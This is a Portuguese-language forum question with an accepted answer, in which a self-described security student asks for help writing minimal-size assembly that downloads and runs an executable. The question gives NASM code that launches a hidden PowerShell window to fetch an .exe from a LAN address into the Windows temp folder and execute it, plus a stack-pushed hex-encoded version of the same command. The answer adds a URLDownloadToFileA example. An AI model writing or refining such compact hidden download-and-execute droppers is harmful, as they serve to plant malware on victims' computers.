# Criação de programa para download e execução de arquivo em assembly

Tags: assembly

Olá galera sou novo no fórum gostaria de uma ajuda de vocês, estou com problemas par criar um programa que baixe e execute um executável em assembly. Eu estudo SI mas ainda não tenho um conhecimento em assembly, por isso estou enfrentando dificuldades para desenvolve-lo.

EU até sei fazer, mas em uma versão de execução de comando no powershell usando algumas DLLs, mas que por algum motivo não funciona bem para meu propósito, também sei fazer a execução de comandos direto pelo CMD sem importação de DLLs apenas chamando algumas funções e alocando com o push, mas eu só consigo colocar comandos curtos e a conversão do comando que eu quero executar fica muito grande e do jeito que eu sei fazer antes da metade dos bytes o comando já se perde por ser grande de mais e o programa não termina a execução.

O propósito é faze-lo com o menor número de bytes possível.

Abaixo vou postar os códigos que  eu tentei:

Este é um código que funciona perfeitamente porém ele apenas abre a calculadora:

[image: inserir a descrição da imagem aqui]

Este é o que eu sei fazer:

[image: inserir a descrição da imagem aqui]

porrem ele usa armazenamento de dados no campo .data como mostrado abaixo, que não serve para o que eu quero.

Código:

```
extern _ShellExecuteA


global _main

section .data

    tipo db "open",0
    cmd db "cmd",0
    par db "/c powershell -windowstyle hidden wget http://192.168.15.39:8787/05.exe -OutFile c:/windows/temp/01.exe ; c:/windows/temp/01.exe"

  
section .text

_main:

    push 0
    push 0
    push par
    push cmd
    push tipo
    push 0
    call _ShellExecuteA
```

Abaixo a coisa porca que eu tentei fazer, até funciona mas só para comandos curtos:

[image: inserir a descrição da imagem aqui]

Código:

```
extern system

global _main


section .text


_main:

    push 0x00657865

    push 0x2e31302f

    push 0x706d6574

    push 0x2f73776f

    push 0x646e6977

    push 0x2f3a6320

    push 0x3b206578

    push 0x652e3130

    push 0x2f706d65

    push 0x742f7377

    push 0x6f646e69

    push 0x772f3a63

    push 0x20656c69

    push 0x4674754f

    push 0x2d206578

    push 0x652e3530

    push 0x2f373837

    push 0x383a3933

    push 0x2e35312e

    push 0x3836312e

    push 0x3239312f

    push 0x2f3a7074

    push 0x74682074

    push 0x65677720

    push 0x6e656464

    push 0x69682065

    push 0x6c797473

    push 0x776f646e

    push 0x69772d20

    push 0x6c6c6568

    push 0x73726577

    push 0x6f70

    push esp

    pop eax

    push eax

    mov ebx, 0x76453dc0

    call ebx
```

Sei que tenho muito que aprender para fazer análises mas se alguém poder ajudar ficarei muito grato.

Comment: Por favor, edite a pergunta para limitá-la a um problema específico com detalhes suficientes para identificar uma resposta adequada.

Answer (score 0, accepted):

E ae Mesmero blz? no caso do windows voce pode usar a API [URLDownloadToFile](https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/ms775123(v=vs.85)), essa Api permite fazer download direto de uma url (recomendo linkar usando o GCC), ex:

```
;compilar: nasm -f win32 kodo.asm & gcc kodo.obj -o kodo.exe -l Urlmon

section text

global _main
extern _URLDownloadToFileA@20
extern _exit

_main:

 ; UrlDownloadToFile(0,"http://127.0.0.1...flow.txt","stack.txt",0,0)
 push 0
 push 0
 push nome
 push url 
 push 0
 call _URLDownloadToFileA@20
 
 ; exit(0)
 push 0
 call _exit

section data
url: db "http://127.0.0.1/stackoverflow.txt",0x0
nome: db "stack.txt",0x0
```

[image]

outra alternativa seria uso de bibliotecas/libs como o libcurl, ou simplesmente abrir um socket cliente refazer a request como seria um download e baixar por ele (alternativa ate interessante para aprofundar mais em asm e sockets)